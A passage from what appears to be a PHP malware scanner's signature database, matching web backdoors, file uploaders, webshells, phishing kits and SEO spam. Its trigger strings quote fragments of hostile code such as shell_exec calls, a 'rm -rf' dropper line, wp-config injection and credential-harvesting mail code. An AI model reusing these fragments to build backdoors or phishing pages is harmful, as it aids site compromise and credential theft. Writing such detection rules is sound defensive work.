		'404-NOT-FOUND-IMG' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.404-not-found-img.001', '@ini_set..display_errors.,.off..;[^\$\{]+ if.\@isset.._POST..size... and \@isset.._FILES[^\)]+\)\) \{\@[^\}]+\} else echo .<!-- 404-NOT-FOUND-ERROR -->.; [^;]+; if \([^\}]+x><.nofollow>.;\}'), //modified by PG - removed commented part due to different comments in variants as seen in php.backdoor.404-not-found-img.001-02.php
		'<\?php[\s]*for\(\$i=0[^{]+\{[\s]*if\(!@move_uploaded_file\(\$_FILES[^{]+\{[\s]*echo "Can.t upload file: \{\$_FILES' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader.162', '<\?php[\s]*for\(\$i=0[^{]+\{[\s]*if\(!@move_uploaded_file\(\$_FILES[^{]+\{[\s]*echo "Can.t upload file: \{\$_FILES[^;]+;[\s]*\}[\s]*}[\s]*break;[\s]*\?>'),
		'$uf=@basename($_FILES[\'uf\'][\'name\']);if(@move_uploaded_file($_FILES[\'uf\'][\'tmp_name\'],$uf)) echo $uf;' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.163', '\$uf=@basename\(\$_FILES\[.uf.\]\[.name.\]\);if\(@move_upl[^;]+echo \$uf;'),
		'if($_GET[\'s4t4n\']=="true")' => array(STR_CLEARFILE, 'php.backdoor.uploader.296', NULL),
		'<a href=$userfile_name><center><b>Sucess' => array(STR_CLEARFILE, 'php.backdoor.uploader.347', NULL),
		'fopen($url.$_GET[' => array(STR_CLEARFILE, 'php.backdoor.uploader.356', NULL),
	),

	'target_path)){echo basename($_FILES["uploadedfile"]["name"])' => array(STR_TRIGGER,

		'target_path' => array(STR_CHAIN_TRIGGER,
			'if($_GET["login"]' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.150.03', 'if\(\$_GET\["login"\][^\{]+\{[\s]*'),
			'target_path)){echo' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.150', '\$target_path[\s]*=[\s]*basename\(\$_FILES[^\n]+Upload File[^>]+><.form>[\s]*(.;\}[\s]*)?'),
		),

		'substr($randStr' => array(STR_CLEARFILE, 'php.backdoor.uploader.150.02', NULL),
	),

	'echo"<center><b>Done ==> $userfile_name' => array(STR_TRIGGER,
		'if($_GET[\'up\']){' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.075', 'if\(\$_GET\[[^{]+\{[^;]+if\(isset\(\$_POST\[.Submit.\]\)\)\{[\s]*\$filedir[^}]+<.center>.;[\s]*\}[\s]*\}[\s]*else[\s]*\{[\s]*echo[^}]+}[\s]*echo[^;]+font>.;[\s]*\}?'),
		'echo \'<center><font color="Red" size' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.075.02', 'echo \'<center><font color="Red" size[^;]+;[^;]+if\(isset\(\$_POST\[.Submit.\]\)\)\{[\s]*\$filedir[^}]+<.center>.;[\s]*\}[\s]*\}[\s]*else[\s]*\{[\s]*echo[^}]+}[\s]*echo[^;]+font>.;[\s]*\}?'),
		'</b></center>";}}else{echo\'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name=' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.016', 'if\(\$_GET\[.\w+.\]\s*=+.\w+.\)\s*{\s*if\(isset\(\$_POST\[[^{]+{\s*\$\w+=\s*[\'"]{2}\s*;[^{]+{(\$\w+)\s*=[^\@]+\@move_uploaded_file\(\$\w+,\s*\1\)\s*;\s*echo[\'"]<center><b>[^}]+}\s*}\s*else\s*{\s*echo\s*[\'"]\s*<form\s*method\s*=\s*[\'"]POST[\'"][^}]+}\s*}\s*else\s*{\s*exit\s*;\s*}'),
	),

	'GIF89' => array(STR_TRIGGER,
		'move_uploaded_file($_FILES["file"]["tmp_name"],$dosyaYolu);' => array(STR_CLEARFILE, 'php.backdoor.uploader.181', NULL),
		'echo "Anjing, upload gagal !";' => array(STR_CLEARFILE, 'php.backdoor.uploader.188', NULL),
	),

	'echo "Error: " . $_FILES["file"]["error"]' => array(STR_TRIGGER,
		'print "<a href=\"$file_name\" target=\"_blank\">$file_name<' => array(STR_CLEARFILE, 'php.backdoor.uploader.048', NULL),
		'Bantai !\"> </form>"; if ($_FILES["file"]["error"] > 0) { echo' => array(STR_CLEARFILE, 'php.backdoor.uploader.237', NULL),
	),

	'$pass=@md5($_POST' => array(STR_TRIGGER,
		'if ($error == UPLOAD_ERR_OK) {' => array(STR_TRIGGER,
			'if($pass==$me)' => array(STR_CLEARFILE, 'php.backdoor.uploader.067', NULL),
		),
	),

	'@touch($destination, $changeTime);' => array(STR_TRIGGER, 
		'echo "<b>Done ==> </b><a href=\'$fullURL\' target=\'_blank\'>$user_file_name</a> - " . $changeTime;' => array(STR_CLEARFILE,'php.backdoor.uploader.051', NULL), //2php_backdoors.db:'move_uploaded_file'
	),

	'print "OK";' => array(STR_TRIGGER,
		'touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], $time);' => array(STR_CLEARFILE, 'php.backdoor.uploader.114', NULL),
	),

	'echo "<b>Uploaded Successfully' => array(STR_TRIGGER,
		'live = md5(md5(md5($_GET' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.068', '\\$live = md5.md5.md5.._GET[^;]+;[\\s]*if[\\s]*.\\$live[^?]+type....<br>";[\\s]*}[\\s]*exit;[\\s]*}'),
	),

	'wordpress page is ok' => array(STR_TRIGGER,
		'<form enctype="multipart/form-data" method="POST"><input' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.028', NULL),
	),

	'if(!empty($_POST[\'file_upload\']))' => array(STR_TRIGGER,
		'move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.417', 'if\(!empty\(\$_POST\[.file_upload.\]\)\)[\s]*\{[\s]*move_uploaded_file[^\}]+\}'),
	),

	'<script>alert(\'Sukses Upload BOSS' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.069', '(if\(isset\(\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*)?echo "<body bgcolor[\s]*=[\s]*black>[\s]*<font color[\s]*=[\s]*yellow[\s]*size[^>]+>";[\s]*echo .<center>[^{]+uploads.\]\)\)[\s]*\{move_uploaded_file\(\$_FILES[^;]+;[\s]*echo "<script>alert\(.Sukses Upload BOSS[^}]+uploads.\]\[.type.\];\}[\s]*}?'),
	'file_put_contents("../wp-config.php",$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell_gen.040.02', 'if\(get_option\(.\w+.\)\!\s*=\s*.true.\){\s*\$\w+\s*=\s*.if\(isset\(.\$_FILES\[[^{]+{move_uploaded_file\(.\$_FILES\[[^,]+,\s*basename\(.\$_FILES\[[^;]+;}\s*if\(.\$_GET[^;]+;\s*file_put_contents\(.(\.\.)?\.\.\/wp-config\.php.,\$\w+,\s*FILE_APPEND\);\s*\$\w+=\"\";[^}]+}\s*\$\w+\s*=get_bloginfo\(.\w+.\);[^_]+_get_contents\([^;]+;\s*add_option\(\s*.\w+.,\s*.true.\);\s*}'),
	'$ls = wscandir($cwd);' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.001', NULL),
	'Send beleberda:' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.002', NULL),
	'print "<td id=\"cell\">".getperms($di' => array(STR_CLEARFILE, 'php.backdoor.lightshell.001', NULL),
	'<a href="?x=x">upload</a>&nbsp;&nbsp;&nbsp;<a href="?x=d">delete</a>&nbsp;' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.005', NULL),
	'defaceIT v' => array(STR_CLEARFILE,'php.defaced.script.009', NULL),
	'function __via_get_dir_file_paths' => array(STR_CLEARFILE, 'php.backdoor.viaWorm-uploader.001', NULL),
	'== $hashcode' => array(STR_CLEARFILE, 'php.backdoor.uploader.050', NULL),
	'chk7 = document.getElementById(\'pchk-7\');' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.078', NULL),
	'$files = array($target."/wp-config.php", $target' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.injector.108', 'if.isset.._GET\\[.[\\w]+.\\]\\)\\)\\{[\\s]*\\$target[\\s]*=[\\s]*\\$_SERVER\\[DOCUMENT_ROOT\\];[\\s]*.dopfile[^"]+"Done:[^\\\\]+if.preg_match[^}]+}else\\{[^}]+}[\\s]*}[\\s]*}[\\s]*}'),
	'if(isset($_GET[\'bataboom\'])){if(isset' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.062', 'if.isset.._GET..bataboom.....if.isset.._FILES..im[^><\?]+?\{\?><form method=[^\?]+?><\?php \}\}'),
	'if (password==pass1){alert(\' yessss' => array(STR_CLEARFILE, 'php.backdoor.uploader.065', NULL),
	'$dim.$im[\'name\']);echo"Done: ".$dim.$im    ' => array(STR_CLEAR_LINEMATCH,'php.backdoor.uploader.058', 'if.isset.._GET\\[.[\\w]+.]\\)\\)\\{if.isset.._FILES\\[.[\\w]+.]\\)\\)\\{\\$dim=getcwd[^?]+\\?><form[^}]+}}'),
	'Echo "<script>alert(\'upload Done\');' => array(STR_CLEARFILE,'php.backdoor.uploader.061', NULL),
	'<option value=../../../../../../../../../..>10</option></select><br/><br/>' => array(STR_CLEARFILE, 'php.backdoor.uploader.072', NULL),
	'crypt($_GET[\'path\'],\'de\') : cwd();' => array(STR_CLEARFILE, 'php.backdoor.filesman.036', NULL),
	'echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";' => array(STR_CLEARFILE, 'php.backdoor.uploader.076', NULL),
	'move_uploaded_file($userfile, "entrika.php");' => array(STR_CLEARFILE, 'php.backdoor.uploader.140', NULL),
	'move_uploaded_file($_FILES[file][tmp_name], $script_directory' => array(STR_CLEARFILE, 'php.backdoor.uploader.115', NULL),
	'echo \'status_ok:\'.dirname(__FILE__).\'/\'.$_FILES["pictures"]["name"];' => array(STR_CLEARFILE, 'php.backdoor.uploader.117', NULL),
	'chmod(\'encrypter_saint_777.php\',0755);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.172', 'move_uploaded_file[^;]+?;\s*chmod\(\'encrypter_saint_777\.php\',0755\);'),
	'if($dir==\'ok\'){$ndir=dirname(__FILE__).\'/\';}else{$ndir=$_SERVER[\'DOCUMENT_ROOT\'].$dir;}' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.176', '\$pswd[^;]+?;\s*if[^;]+?;\s*if\(\$dir==\'ok\'\)\{\$ndir=dirname\(__FILE__\)\.\'\/\';\}else\{\$ndir=\$_SERVER\[\'DOCUMENT_ROOT\'\]\.\$dir;\}\s*[^,]+?,\s*0?777\s*\)\s*;\s*move_uploaded_file[^;]+?;\s*\}\s*\}'),
	'var_dump(move_uploaded_file($_FILES["file"]["tmp_name"],\'../\' . $_FILES["file"][\'name\']));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.177', '<html>\s*<body>\s*<form[^>]+?>\s*<label[^>]+?>Filename:[^>]+?>\s*<input[^>]+?>\s*<input[^>]+?>\s*<.form>\s*<.body>\s*<.html>\s*<\?php\s*var_dump\(move_uploaded_file\(\$_FILES\["file"\]\["tmp_name"\],\'\.\.\/\'\ \.\ \$_FILES\["file"\]\[\'name\'\]\)\);'),
	'SECURITYHELL.INFO // Upload SCRIPT' => array(STR_CLEARFILE, 'php.backdoor.uploader.211', NULL),
),

'<html' => array(STR_TRIGGER,

	'mail(' => array(STR_TRIGGER,

		'\$_POST\[.(?i)password.\]' => array(REX_TRIGGER,

			'fputs ($' => array(STR_TRIGGER,
				'mail($' => array(STR_CLEARFILE, 'php.phishing.mailer.121', NULL),
			),

			'}<?php $subj =' => array(STR_CLEARFILE, 'php.phishing.mailer.070', NULL),
			'file_put_contents($file, $msg' => array(STR_CLEARFILE, 'php.phishing.mailer.071', NULL),
		),

		'<meta http-equiv="refresh' => array(STR_TRIGGER,
			'$message.= \'Password:' => array(STR_CLEARFILE, 'php.phishing.mailer.123', NULL),
			'"Credit Card Number: ".$_POST[\'cc\'].' => array(STR_CLEARFILE, 'php.phishing.mailer.125', NULL),
		),

		'fwrite($' => array(STR_TRIGGER,

			'$message .=' => array(STR_TRIGGER,
				'header(\'HTTP/1.0 403 Forbidden' => array(STR_CLEARFILE, 'php.phishing.mailer.131', NULL),
			),

			'if (!empty($vbvError)) {echo $vbvError; }' => array(STR_CLEARFILE, 'php.phishing.mailer.132', NULL),
		),
		
		'$headers = "From:' => array(STR_TRIGGER,
			'$dir->read())' => array(STR_CLEARFILE, 'php.phishing.mailer.133', NULL),
		),

		'ACCOUNT PAYPAL FULLZ' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.008', '\$\w+\s+=\s+@\$_SERVER\[\'HTTP_CLIENT_IP\'\];[^{]*{\s+\$IPN\s+=[^@]*@anodaz[^<]*<html>[^A]*ACCOUNT PAYPAL[^{]*{\s+\$\w+\s+=\s+"\s+<html>[^}]*}'),
		'>As an additional security check, please confirm the following details to verify your identity.<' => array(STR_CLEARFILE, 'php.phishing.scotiabank.001', NULL),
		'\$subj[\s]*=[\s]*.[\W]*[\w]*[^@]+mail\(.[\w]+[\W]*[\w]*@[\w]*\.[\w]*.,[^\;]+\);[\s]*echo[\s]*[^\;]+html;' => array(REX_CLEARFILE, 'php.phishing.mailer.081', NULL),
		'XBALTI' => array(STR_CLEARFILE, 'php.phishing.mailer.090', NULL),
		'B.r.a.d.e.s.c.o' => array(STR_CLEARFILE, 'php.phishing.mailer.098', NULL),
		'Shaw Communications' => array(STR_CLEARFILE, 'php.phishing.shaw.001', NULL),
		'N3TW4R INBOX' => array(STR_CLEARFILE, 'php.hacktool.mailer.134', NULL),
		'\'From: AOL CYX' => array(STR_CLEARFILE, 'php.phishing.aol.002', NULL),
	),

	'Login' => array(STR_TRIGGER,
		'----+ Office365' => array(STR_CLEARFILE, 'php.phishing.office365.001', NULL),
		'Battle.net Account Login' => array(STR_CLEARFILE, 'html.phishing.battle_net.001', NULL),
		'Remax - Secure Login' => array(STR_CLEARFILE, 'html.phishing.remax.001', NULL),
		'Microsoft - Secure Login' => array(STR_CLEARFILE, 'html.phishing.microsoft.001', NULL),
		'Vodafone UK - Login/Register' => array(STR_CLEARFILE, 'html.phishing.vodafone.001', NULL),
		'form name="hwebmail_login" method="post" action="redirect.php" autocomplete="on" onsubmit="return validateForm' => array(STR_CLEARFILE, 'html.phishing.webmail.001', NULL),
		'document.cookie = "rsea_cust=1; expires="+next_month+"; path=/; domain=.rackspace.com' => array(STR_CLEARFILE, 'php.phishing.rackspace.001', NULL),
		'<title>Account verification</title>' => array(STR_CLEARFILE, 'html.phishing.generic.061', NULL),
		'<title>BME HSZK' => array(STR_CLEARFILE, 'html.phishing.bme_hszk.001', NULL),
		'<title>Online Banking' => array(STR_CLEARFILE, 'html.phishing.bbt.001.02', NULL),
		'<title>Access to PDF Files On Adobe Server' => array(STR_CLEARFILE, 'php.phishing.adobe.002', NULL),
		'Qantas Airways Limited ABN' => array(STR_CLEARFILE, 'html.phishing.qantas.001', NULL),
		'<title><?php echo $lg_sign[\'title\']?></title>' => array(STR_CLEARFILE, 'php.phishing.paypal.022', NULL),
		'<title>Access My Customer Space</title>' => array(STR_CLEARFILE, 'html.phishing.hydroquebec.001', NULL),
		'esetPasswordCheck?d=telefonica.net' => array(STR_CLEARFILE, 'html.phishing.telefonica.001', NULL),
	),

	'xml:lang="ja"' => array(STR_TRIGGER,

		'wp-content/cache/' => array(STR_TRIGGER,        
			'/wp-includes/SimplePie/' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.001', NULL),
			'/wc-logs/' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.001.02', NULL),
		),

		'/wc-logs/' => array(STR_TRIGGER,        
			'/wp-includes/SimplePie/' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.001.03', NULL),
			'wp-content/cache/' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.001.04', NULL),
		),
	),

	'<meta http-equiv="refresh" content=' => array(STR_TRIGGER,
		'; URL=https://www.gov.uk/government/organisations/hm-revenue-customs">' => array(STR_CLEARFILE, 'php.phishing.gov_uk.003', NULL),
		'; url=http://www.alpha-index.co.uk/' => array(STR_CLEARFILE, 'html.phishing.generic.074', NULL),
		'Hydro Québec</span>' => array(STR_CLEARFILE, 'html.phishing.hydroquebec.003', NULL),
		'html><head><meta http-equiv="refresh" content="0;URL=https://href.li/?https://www.gov.uk/' => array(STR_CLEARFILE, 'php.phishing.gov_uk.004', NULL),
	),

	'$msg' => array(STR_TRIGGER,
		'$msg .= "PIN: ".$_POST[\'csp' => array(STR_CLEARFILE, 'php.phishing.standardbank.001', NULL),
		'$msg = "OTP: ".$_POST[\'dap' => array(STR_CLEARFILE, 'php.phishing.standardbank.001.02', NULL),
		'$msg .= \'Password : \'.$_POST[\'emailpass' => array(STR_CLEARFILE, 'php.phishing.standardbank.001.03', NULL),
	),

	'$md5 = md5(uniqid(time()));' => array(STR_TRIGGER,
		'function isMobile()' => array(STR_CLEARFILE, 'php.phishing.generic.058', NULL),
		'self.location.replace(loc);' => array(STR_CLEARFILE, 'php.phishing.generic.058.02', NULL),
	),

	'<title>Email Settings' => array(STR_TRIGGER,
		'wait while we update your account settings' => array(STR_CLEARFILE, 'html.phishing.windows_live_id.002.02', NULL),
		'de-activation has been cancelled' => array(STR_CLEARFILE, 'html.phishing.windows_live_id.002.03', NULL),
	),

	'cPanel' => array(STR_TRIGGER,
		'<form novalidate id="login_form" action="' => array(STR_CLEARFILE, 'html.phishing.cPanel.002', NULL),
		'>Automatic cPanel Finder' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.009', NULL),
	),

	'<title>Sign In</title>' => array(STR_TRIGGER,
		'<a href="https://www.secureserver.net/legal-agreement?id=privacy' => array(STR_CLEARFILE, 'php.phishing.godaddy.003', NULL),
		'https://sso.godaddy.com/login?app' => array(STR_CLEARFILE, 'php.phishing.godaddy.004', NULL),
	),

	'\x' => array(STR_TRIGGER,
		'Mr Trovaz' => array(STR_CLEARFILE, 'php.phishing.MrTrovaz.001', NULL),
		'str_replace(\'./index/' => array(STR_CLEARFILE, 'php.phishing.generic.092', NULL),
	),

	'porn' => array(STR_TRIGGER,
		'="promo.php?utm_term=' => array(STR_CLEARFILE, 'html.spam-seo.pornspam.001', NULL),
	),

	'<title>Sign in</title>' => array(STR_TRIGGER,
		'©2018 Microsoft' => array(STR_CLEARFILE, 'php.phishing.microsoft.006', NULL),
	),

	'<title>Windows Settings' => array(STR_TRIGGER,
		'form method="post" action="post.php"' => array(STR_CLEARFILE, 'html.phishing.windows_live_id.002', NULL),
	),

	'==></frame>' => array(STR_TRIGGER,
		'<title>Google Drive' => array(STR_CLEARFILE, 'html.phishing.googledrive.002', NULL),
	),

	'<title>ExpressVPN' => array(STR_TRIGGER,
		'2468.go2cloud.org/aff_ad?campaign_id=10&aff_id=1004' => array(STR_CLEARFILE, 'html.phishing.thepiratebay.001.02', NULL),
	),

	'<title>advertisment' => array(STR_TRIGGER,
		'iframe src="//ads.exoclick.com/iframe.php?idzone=522605&size=728x9' => array(STR_CLEARFILE, 'html.phishing.thepiratebay.001.03', NULL),
	),

	'HACKED BY' => array(STR_TRIGGER,
		'HACKED BY Absent' => array(STR_CLEARFILE, 'html.defaced.Absent.001', NULL),
	),

	'godaddy.com/"><img src="data:image;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAABSCAMAAAB6' => array(STR_TRIGGER,
		'<title>Sign In</title>' => array(STR_CLEARFILE, 'html.phishing.godaddy.001', NULL),
	),

	'<form action="alilogon.php" method="post">' => array(STR_CLEARFILE, 'html.phishing.alibaba.001', NULL),
	'http://happycdou.com/afters/grittier.js' => array(STR_CLEARFILE, 'html.phishing.americanexpress.001', NULL),
	'American Express Credit Cards, Rewards' => array(STR_CLEARFILE, 'html.phishing.americanexpress.002', NULL),
	'<meta http-equiv="refresh" content="4;URL=http://www.americanexpress.com" />' => array(STR_CLEARFILE, 'html.phishing.americanexpress.003', NULL),
	'<title>American Express US: Thank you' => array(STR_CLEARFILE, 'html.phishing.americanexpress.007', NULL),
	'www.creditmutuel.fr/cmcee/fr/css' => array(STR_CLEARFILE, 'html.phishing.creditmutuel.001', NULL),
	'https://onlinebanking.mandtbank.com/layouts/RetailStyle.css' => array(STR_CLEARFILE, 'html.phishing.matbank.001', NULL),
	'Welcome to Facebook - Log In, Sign Up or Learn More</title>' => array(STR_CLEARFILE, 'html.phishing.facebook.001', NULL),
	'<span class="bb bz">Facebook &copy;' => array(STR_CLEARFILE, 'html.phishing.facebook.002', NULL),
	'title="Go to Facebook Home">' => array(STR_CLEARFILE, 'html.phishing.facebook.004', NULL),
	'content="Outlook.com is a free, personal email' => array(STR_CLEARFILE, 'html.phishing.microsoft.007', NULL),
	'your bank account</title>' => array(STR_CLEARFILE, 'php.phishing.paypal.017', NULL),
	'<title>Yahoo -&nbsp;login</title>' => array(STR_CLEARFILE, 'php.phishing.yahoo.003', NULL),
	'zLy9Hb29nbGVfZG9jc19maWxlcy9zdHlsZTIuY3NzIiByZ' => array(STR_CLEARFILE, 'html.phishing.google_accounts.009', NULL),
	'Mailer by Sphinx' => array(STR_CLEARFILE, 'html.hacktool.mailer.001', NULL),
	'<title>Sign In - DocuSign</title>' => array(STR_CLEARFILE, 'html.phishing.docusign.002', NULL),
	'<title> Inbox kabylieteam </title>' => array(STR_CLEARFILE, 'html.hacktool.mailer.002', NULL),
	'<title>Chase Online' => array(STR_CLEARFILE, 'html.phishing.chase.001.003', NULL),
	'<title>Apple - M' => array(STR_CLEARFILE, 'html.phishing.apple.001.001', NULL),
	'<title>Apple - Confirmation Your Account Information' => array(STR_CLEARFILE, 'html.phishing.apple.001.006', NULL),
	'<title>Apple - Il mio ID Apple</title>' => array(STR_CLEARFILE, 'html.phishing.apple.001.010', NULL),
	'<title>iTunes Connect' => array(STR_CLEARFILE, 'html.phishing.apple.002', NULL),
	'<title>Secure internet shopping<' => array(STR_CLEARFILE, 'html.phishing.apple.002.002', NULL),
	'<title>Cryptogramme visuel Information</title>' => array(STR_CLEARFILE, 'php.phishing.generic.003',NULL),
	'<title>Apple - iTunes Clients' => array(STR_CLEARFILE, 'html.phishing.apple.004', NULL),
	'<title>Google | Drive' => array(STR_CLEARFILE, 'html.phishing.googledrive.001', NULL),
	'<title>Aguarde..' => array(STR_CLEARFILE, 'html.phishing.generic.046', NULL),
	'Portal do cliente | Seja Bem-vindos' => array(STR_CLEARFILE, 'html.phishing.generic.047', NULL),
	'Inicial - Banco do Brasil</title>' => array(STR_CLEARFILE, 'html.phishing.bancobrasil.004', NULL),
	'ST GEORGE BANK : Account Verified<' => array(STR_CLEARFILE, 'html.phishing.stgeorge.002', NULL),
	'<title>AOL -&nbsp;login</title>' => array(STR_CLEARFILE, 'php.phishing.aol.001', NULL),
	'<title>Outlook Web App' => array(STR_CLEARFILE, 'html.phishing.outlook.004', NULL),
	'&#39034;&#20016;&#36895;&#36816;' => array(STR_CLEARFILE, 'html.phishing.sfexpress.001', NULL),
	'content="0; URL=data:text/html;base64,77u/CjwhZG9jdHlwZSBodG1sIHB1YmxpYyAgIi0vL1' => array(STR_CLEARFILE, 'html.phishing.discover.004', NULL),
	'>P<span><font>a</font></span>y</font><font color="#0098db">Pal<' => array(STR_CLEARFILE, 'html.phishing.paypal.015', NULL),
	'<title>:::  BOI  :::' => array(STR_CLEARFILE, 'php.phishing.bankofireland.001', NULL),
	'SecureSignup.net Special offer and Discoun' => array(STR_CLEARFILE, 'html.phishing.SecureSignup_net.001', NULL),
	'Welcome to eBay' => array(STR_CLEARFILE, 'html.phishing.ebay.001', NULL),
	'POF.com &trade; The Leading Free Online Dating Site for Singles &amp; Personals</title>' => array(STR_CLEARFILE, 'html.phishing.POF.001', NULL),
	'action="other.php" id="gaia_loginform"' => array(STR_CLEARFILE, 'html.phishing.googledocs.003', NULL),
	'Google Drive - Google Docs' => array(STR_CLEARFILE, 'html.phishing.googledocs.004', NULL),
	'Free Web Hosting - Subdomain And/Or Domain' => array(STR_CLEARFILE, 'html.phishing.freewebhosting.001', NULL),
	'Send Money, Pay Online' => array(STR_CLEARFILE, 'html.phishing.generic.002', NULL),
	'Surpreenda MasterCard | Cadastro' => array(STR_CLEARFILE, 'html.phishing.mastercard.003', NULL),
	'Elance: Please Sign In' => array(STR_CLEARFILE, 'html.phishing.generic.006', NULL),
	'Log in to online banking' => array(STR_CLEARFILE, 'html.phishing.generic.007', NULL),
	'"TAM FIDELIDADE";' => array(STR_CLEARFILE, 'html.phishing.generic.009', NULL),
	' G00dLuck ' => array(STR_CLEARFILE, 'html.phishing.generic.010', NULL),
	'>Your Apple ID gives you easy access to' => array(STR_CLEARFILE, 'html.phishing.apple.001.005', NULL),
	'<title>Sign In to LinkedIn' => array(STR_CLEARFILE, 'html.phishing.linkedin.002', NULL),
	'<span>now , you can sign in to dropbox with all email providers.</span>' => array(STR_CLEARFILE, 'html.phishing.dropbox.001', NULL),
	'function challs_flash_update()' => array(STR_CLEARFILE, 'html.malware.challs_uploader_interface.001', NULL),
	'Scam PayPal V' => array(STR_CLEARFILE, 'php.phishing.paypal.006', NULL),
	'L&omicron;gin - &Rho;&#97;&#121;&Rho;&#97;&#108;' => array(STR_CLEARFILE, 'php.phishing.paypal.008', NULL),
	'>The RBC Wallet is now available on all Android phones<' => array(STR_CLEARFILE, 'php.phishing.RBCwallet.001', NULL),
	'<title>ICICI Bank - Email Authentication</title>' => array(STR_CLEARFILE, 'html.phishing.ICICI.001', NULL),
	'L33bo phisher' => array(STR_CLEARFILE, 'php.phishing.L33bo.001', NULL),
	'content="0; URL= data:text/html;charset=utf-8;base64,DQo8IURPQ1RZUEUgaHRtb' => array(STR_CLEARFILE, 'html.phishing.onlinebanking.003', NULL),
	'; url=https://secure.bankofamerica.com/applynow' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.007', NULL),
	'; url=https://www.capitalone.com' => array(STR_CLEARFILE, 'html.phishing.capitalone.001', NULL),
	'<title>DHL EXPRESS' => array(STR_CLEARFILE, 'html.phishing.dhl.001', NULL),
	'<title>DHI EXPRESS' => array(STR_CLEARFILE, 'html.phishing.dhl.004', NULL),
	'lease enter your correct Social Security Number' => array(STR_CLEARFILE, 'html.phishing.generic.053', NULL),
	'<title>-PayPal-</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.018', NULL),
	'(?i)<title>\s*bank\s*[0o]f\s*america' => array(REX_CLEARFILE, 'rex.phishing.bankofamerica.001', NULL),
	'alert ("Veuillez confirmer votre PassCyberplus avant de continuer")' => array(STR_CLEARFILE, 'html.phishing.banque_populaire.001', NULL),
	'<title>Wells Fargo</title>' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.005', NULL),
	'<title>One Drive' => array(STR_CLEARFILE, 'html.phishing.microsoft.012', NULL),
	'Log in to Facebook | Facebook</title>' => array(STR_CLEARFILE, 'html.phishing.facebook.005', NULL),
	'<title>PNC - PERSONAL BANKING</title>' => array(STR_CLEARFILE, 'html.phishing.pnc_banking.001', NULL),
	'<title>PNC Online Banking</title>' => array(STR_CLEARFILE, 'html.phishing.pnc_banking.002', NULL),
	'<title>Sign in to your Microsoft' => array(STR_CLEARFILE, 'html.phishing.microsoft.013', NULL),
	'<title>Zimbra Web Client' => array(STR_CLEARFILE, 'html.phishing.zimbra.001', NULL),
	'Sign in to Office 365</title>' => array(STR_CLEARFILE, 'html.phishing.microsoft.014', NULL),
	'>Authentification</' => array(STR_CLEARFILE, 'html.phishing.generic.066', NULL),
	'Case ID : <b>[WFnumber]' => array(STR_CLEARFILE, 'html.phishing.apple.018', NULL),
	'.btn1{ background:url(http://www.eyou.com/tpl/user/tpl1/images/' => array(STR_CLEARFILE, 'html.phishing.generic.077', NULL),
	'MegaMass Evil' => array(STR_CLEARFILE, 'html.phishing.generic.080', NULL),
	'<title>Adobe Online' => array(STR_CLEARFILE, 'html.phishing.adobe.010', NULL),
	'<title>Formulario de reembolso electrónico</title>' => array(STR_CLEARFILE, 'html.phishing.endesa.001', NULL),
	'<title>Confirmar su tarjeta</title>' => array(STR_CLEARFILE, 'html.phishing.endesa.001.02', NULL),
    '<title>Please Hold...Checking Info</title>' => array(STR_CLEARFILE, 'html.phishing.adobe.012', NULL),
    '<title>Secured Doc Page</title>' => array(STR_CLEARFILE, 'html.phishing.generic.100', NULL),
    '<title>... Session Expired</title>' => array(STR_CLEARFILE, 'html.phishing.generic.101', NULL),
),

'hell' => array(STR_TRIGGER,

	'exec' => array(STR_TRIGGER,

		'echo' => array(STR_TRIGGER,

			'$_POST' => array(STR_TRIGGER,

				'netstat -an | grep -i listen' => array(STR_TRIGGER,
					'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow' => array(STR_CLEARFILE, 'php.hacktool.generic.023', NULL),
				),

				'exec(\'ps ax|grep' => array(STR_TRIGGER,
					'exec(\'crontab' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.008', NULL),
				),

				'shell_exec("$' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.007', NULL),
				'defined[\s]*\(.FM_HIGHLIGHTJS_STYLE.\)[\s]*\|\|[\s]*define[\s]*\(.FM_HIGHLIGHTJS_STYLE.[\s]*,[\s]*\$highlightjs_style\);' => array(REX_CLEARFILE, 'php.backdoor.filesman.134', NULL),
			),

			'$output = shell_exec(\'perl' => array(STR_TRIGGER,
				';rm -rf .' => array(STR_CLEARFILE, 'php.malware.dropper.037', NULL),
			),

			'echo touch(dirname(__FILE__).' => array(STR_TRIGGER,
